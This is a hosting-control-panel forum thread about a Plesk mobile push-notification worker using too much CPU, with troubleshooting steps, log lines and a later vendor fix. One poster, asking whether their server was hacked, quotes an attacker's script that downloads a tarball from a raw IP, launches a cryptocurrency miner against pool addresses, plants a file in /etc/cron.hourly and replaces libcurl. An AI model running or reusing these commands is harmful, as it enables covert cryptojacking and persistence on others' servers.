• If you are still using CentOS 7.9, it's time to convert to Alma 8 with the free centos2alma tool by Plesk or Plesk Migrator. Please let us know your experiences or concerns in this thread:
    CentOS2Alma discussion

High CPU usage by a process

Michele.mc2

New Pleskian
Hello!

For several days, the CPU usage is constantly at 90-100%.

The responsible of such a high consumption is a unique processes that, alone, use the 75-80% or more.

That's what this is:

Process Information
Command /usr/bin/sw-engine -c /usr/local/psa/admin/conf/php.ini -c /usr/local/psa/admin/conf/php.ini -dauto_prepend_file=sdk.php /usr/local/psa/admin/plib/modules/plesk-mobile/scripts/push_worker.php
Parent process crond
Owner root
CPU 75.9 %

It seems to me that it is a process related to PleskManager. Is that so?
It is its normal behavior or is there something wrong?

Thank you!

Michele

Hello,

Yes, this process is related with Plesk Manager and processes push notifications for you phone.

It's not a normal behavior. To debug the behavior you can do the following:
1. Login to Plesk Panel
2. Go to Extensions, open Parallels Panel Mobile Center
3. Select log level "notice" and save
4. See log file: /usr/local/psa/var/modules/plesk-mobile/MobileConnector.log

You can send me this file in PM and I'll try to help you with investigation.

I suppose many events occurred and now Plesk is trying to send them to your device.

You can try the following:
1. Login to Plesk
2. Go to Extensions
3. Open Parallels Panel Mobile Center
4. Uncheck Push notifications and save
5. Remove all cron jobs related with mobile app (if they exist)
6. Enable Push notifications again. One cron job should be created

The task will try to send notifications.

This solution fixed the issue of Michele.mc2

Hello vlikhtanskiy!

I'm sorry I have to update this thread...

The solution you suggested to me yesterday fixed the issue for some time.
After some hours, about 7, the process started again to use a lot of cpu, but fewer then previous time: now it is at 55-60% (last time at about 80%).

I've checked again the log you wrote me and I found, among other similar lines, the following (where XXX.XXX.XXX.XXX is the ip of my iphone):

Code:
Aug 27 08:39:33 (435cf) [NOTICE] [User] cli Starting push worker (12260) iteration 38.
Aug 27 08:39:33 (435cf) [NOTICE] [User] cli Finished push worker (12260) iteration 38.
Aug 27 08:39:36 (b4ba7) [NOTICE] [User] XXX.XXX.XXX.XXX Created exception MobileConnector\Modules_PleskMobile_Plesk_Api_Exception, message: 'Authentification method is not specified', code: 1029.
Aug 27 08:39:36 (b4ba7) [NOTICE] [User] XXX.XXX.XXX.XXX Created exception MobileConnector\Modules_PleskMobile_UserIdentity_Exception, message: 'You have entered incorrect username or password', code: 1001.
Aug 27 08:39:48 (435cf) [NOTICE] [User] cli Starting push worker (12260) iteration 39.
Aug 27 08:39:48 (435cf) [NOTICE] [User] cli Finished push worker (12260) iteration 39.
Aug 27 08:40:03 (84502) [NOTICE] [User] cli Starting push notification delivery worker, pid 13612
Aug 27 08:40:03 (84502) [NOTICE] [User] cli Starting push worker (13612) iteration 0.
Aug 27 08:40:03 (84502) [NOTICE] [User] cli Finished push worker (13612) iteration 0.

I guess you'll have to put up with me for a while, on this issue... :p

Thank you for your (further) assistance! :)

Hi Michele,

Did you solved your issue? I'm having the same problem and I have to kill those processes every few days to lower the cpu usage. I always end up with hanging processes (all related to plesk mobile extension). The app seems to work fine on my ios and android devices.
Any advice from Parallels?

Thanks,
Cosmin

Hi Cosmin,

It is a version issue with Parallels Panel Mobile Center, if I remember correctly.

For now, I have solved disabling push notifications in Extensions -> Parallels Panel Mobile Center. Disabling push notifications, the cronjob starting the process is deleted.
I'm still able to read server info using the app, but I don't get push notifications (of course...). And no more big cpu usage by that process.

To be honest, I have not recently reminded to check if in the meantime solutions have been proposed or if an update was released about.

Hope this can help!

Bye!

Michele

Thanks, I disabled the push notifications also. But it would be nice if Plesk wouldn't be so .. buggy.

Cheers!

can someone please help me to remove /usr/bin/sw-engine -c /usr/local/psa/admin/conf/php.ini -c /usr/local/psa/admin/conf/php.ini -dauto_prepend_file=sdk.php /usr/local/psa/admin/plib/modules/plesk-mobile/scripts/push_worker.php

I just migrated the server and the extension was not moved and I don't have it anymore. I need to stop this process from happening.

Thanks

Last day I saw one server has issues with heavy cpu usage by miner process ? What kind of process is this ? Is this a root level hacking ?

[root@html]# ll
total 104
-rw-r--r-- 1 root root 351 Jul 24 00:33 a
drwxr-xr-x 4 sw-cp-server sw-cp-server 4096 Oct 27 18:12 cpu
-rw-rw-rw- 1 root root 92737 Oct 27 17:40 lol

[root@]# cat /var/html/a
wget http://81.169.134.139/cpu1.tgz
tar zxvf cpu1.tgz
rm -rf cpu1.tgz
cd cpu
chmod +x psa
./a
#nohup ./miner --url http://166.78.153.247:8344 --userpass geox.3:aaa --algo=scrypt 1>log 2>log >> /dev/null &
nohup ./miner --url http://81.196.63.131:8332 --userpass geox.1:aaa --algo=scrypt 1>log 2>log >> /dev/null &
rm -rf /tmp/a
mv psa /etc/cron.hourly

There are 2 folder each for 32 nd 64 bit os

[root@centos5151130 c64]# ll
total 372
-rwxr-xr-x 1 root root 36 May 24 03:14 inst
-rw-r--r-- 1 root root 229828 May 24 03:05 libcurl.so.4
-rwxr-xr-x 1 root root 131778 May 24 03:03 miner

[root@centos5151130 c64]# cat inst
mv lib* /usr/lib
echo "Ready to go"

And one of the files have the above (replacing Libcurl)

Please let me know if there is any details of this hack ? Hos they got in ?

Hello, all.

We finally caught the issue on our test servers and fixed the bug.

To fix your servers do the following:
1. Download the latest version of Parallels Panel Mobile Center: Linux, Windows
2. Login to Plesk Panel
3. Go to Extensions
4. Click "Add Extenion" and upload archive
5. If you already have the process of push_worker with high CPU usage just kill it

Back